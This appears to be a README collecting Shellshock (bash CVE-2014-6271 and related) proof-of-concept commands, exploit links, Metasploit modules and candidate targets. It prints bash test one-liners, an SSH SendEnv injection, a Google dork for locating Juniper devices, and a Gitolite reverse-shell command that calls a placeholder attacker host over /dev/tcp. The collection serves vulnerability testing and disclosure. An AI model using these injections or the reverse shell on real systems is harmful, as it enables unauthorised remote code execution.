Collection of Proof of Concepts and Potential Targets for #ShellShocker
Wikipedia Link: https://en.wikipedia.org/wiki/Shellshock_%28software_bug%29#CVE-2014-7186_and_CVE-2014-7187_Details
Please submit a pull request if you have more links or other resources
Speculation:(Non-confirmed possibly vulnerable)
- XMPP(ejabberd)
Mailman- confirmed not vulnerable- MySQL
- NFS
- Bind9
- Procmail see
- Exim see
- Juniper Google Search
inurl:inurl:/dana-na/auth/url_default/welcome.cgi
- Cisco Gear
- FreePB / Asterix patched here
If you know of PoCs for any of these, please submit an issue or pull request with a link.
- bashcheck - script to test for the latest vulns
env X='() { :; }; echo "CVE-2014-6271 vulnerable"' bash -c id
will create a file named echo in cwd with date in it, if vulnerable
env X='() { (a)=>\' bash -c "echo date"; cat echo
bash -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF' || echo "CVE-2014-7186 vulnerable, redir_stack"
(for x in {1..200} ; do echo "for x$x in ; do :"; done; for x in {1..200} ; do echo done ; done) | bash || echo "CVE-2014-7187 vulnerable, word_lineno"
env X='() { _; } >_[$($())] { echo CVE-2014-6278 vulnerable; id; }' bash -c :
- Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
will segfault if vulnerable
env X='() { x() { _; }; x() { _; } <<a; }' bash -c :
- Additional discussion on fulldisclosure: http://seclists.org/fulldisclosure/2014/Oct/9
- Additional information: http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html
- Metasploit Exploit Module - Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)
- Metasploit Exploit Module - Advantech Switch Bash Environment Variable Code Injection (Shellshock)
- Metasploit Exploit Module - IPFire Bash Environment Variable Injection (Shellshock)
- HTTP Header Polution by @irsdl - http://pastebin.com/QNkf7dYS
- HTTP CGI-BIN - http://pastebin.com/166f8Rjx
- cPanel - http://blog.sucuri.net/2014/09/bash-vulnerability-shell-shock-thousands-of-cpanel-sites-are-high-risk.html
- Digital Alert Systems DASDEC - http://seclists.org/fulldisclosure/2014/Sep/107
- F5 - https://twitter.com/securifybv/status/515035044294172673
- Invisiblethreat.ca - https://www.invisiblethreat.ca/2014/09/cve-2014-6271/
- Commandline version - https://gist.github.com/mfadzilr/70892f43597e7863a8dc
- User-Agent based walkthrough with LiveHTTPHeaders - http://www.lykostech.net/lab-time-exploiting-shellshock-bash-bug-virtual-server/
- User-Agent based walkthrough with Burp - http://oleaass.com/shellshock-proof-of-concept-reverse-shell/
- User-Agent based but supports Tor and Socks5 (Python) - https://github.com/lnxg33k/misc/blob/master/shellshock.py
- User-Agent based in Ruby - https://github.com/securusglobal/BadBash
- Header based simple scanner using sleep with multithread support - https://github.com/gry/shellshock-scanner
- shocker - Checks across a list of URLs in a file, or a single URL, against a list of known vulnerable CGI resources (Content-type Method)
- Xymon - https://lists.xymon.com/archive/2014-September/040350.html
- QNAP - https://www.exploit-db.com/exploits/36503
- Trusted sec exploitation via Tftpd32 - https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/
- Metasploit Exploit Module - Dhclient Bash Environment Variable Injection (Shellshock)
- Metasploit Auxiliary Module - https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/server/dhclient_bash_env.rb
- Perl Script - http://pastebin.com/S1WVzTv9
- using a Wi-Fi pineapple to force people to join the network - http://d.uijn.nl/?p=32
- Stack Overflow - http://unix.stackexchange.com/questions/157477/how-can-shellshock-be-exploited-over-ssh
- SSH ForcedCommand - https://twitter.com/JZdziarski/status/515205581226123264
- SendEnv:
LC_X='() { :; }; echo vulnerable' ssh foo@bar.org -o SendEnv=LC_X
- Gitolite - https://twitter.com/Grifo/status/515089986161766400
- $
ssh GITOLITEUSER@VULNERABLEIP '() { ignore;}; /bin/bash -i >& /dev/tcp/REVERSESHELLIP/PORT 0>&1'
- (necessary to have a git account on the server)
- $
- Priv Escalation via VMware Fusion - https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/osx/local/vmware_bash_function_root.rb
- Fix: http://support.apple.com/kb/DL1769
- Example zone file: in-addr.arpa that contains a CVE-2014-6271 example.
- Example file with a getnameinfo() that passes on to setenv(): osx-rev-ptr.c
- Advisory with description of above CVE-2014-3671.txt
- SIP Proxies: https://github.com/zaf/sipshock
- Detailed walkthrough - http://marc.info/?l=qmail&m=141183309314366&w=2
- Tweet from @ymzkei5 - http://twitter.com/ymzkei5/status/515328039765307392
- Pure-FTPd: https://gist.github.com/jedisct1/88c62ee34e6fa92c31dc
- Metasploit Exploit Module - Pure-FTPd External Authentication Bash Environment Variable Code Injection (Shellshock)
- OpenVPN - https://news.ycombinator.com/item?id=8385332
- PoC Walkthrough by @fj33r - http://sprunge.us/BGjP
- Via @DJManilaIce - http://pastie.org/9601055
user@localhost:~$ env X='() { (a)=>\' /bin/bash -c "shellshocker echo -e \" __ __\n / V \ \n _ | | |\n / \ | | |\n | | | | |\n | | | | |\n | |__| | |\n | | \ |___|___\n | \ |/ \ \n | | |______ |\n | | | |\n | \__' / |\n \ \( /\n \ /\n \| |\n\""; cat shellshocker
/bin/bash: X: line 1: syntax error near unexpected token `='
/bin/bash: X: line 1: `'
/bin/bash: error importing function definition for `X'
__ __
/ V \
_ | | |
/ \ | | |
| | | | |
| | | | |
| |__| | |
| | \ |___|___
| \ |/ \
| | |______ |
| | | |
| \__' / |
\ \( /
\ /
\| |
- Metasploit Exploit Module - CUPS Filter Bash Environment Variable Code Injection
- Metasploit Exploit Module - Xdh / LinuxNet Perlbot / fBot IRC Bot Remote Code Execution
- Metasploit Exploit Module - Legend Perl IRC Bot Remote Code Execution
shell_shocker.py
- Good for interacting with a known vulnerable URL to pass commands (User-Agent Method)w3af_shocker.py
- Automates the process of running a w3af spider/shell_shock scan (User-Agent Method)shell_sprayer.py
- Checks across a list of URLs in a file, or a single URL against a known list of cgi-bin resources (User-Agent Method)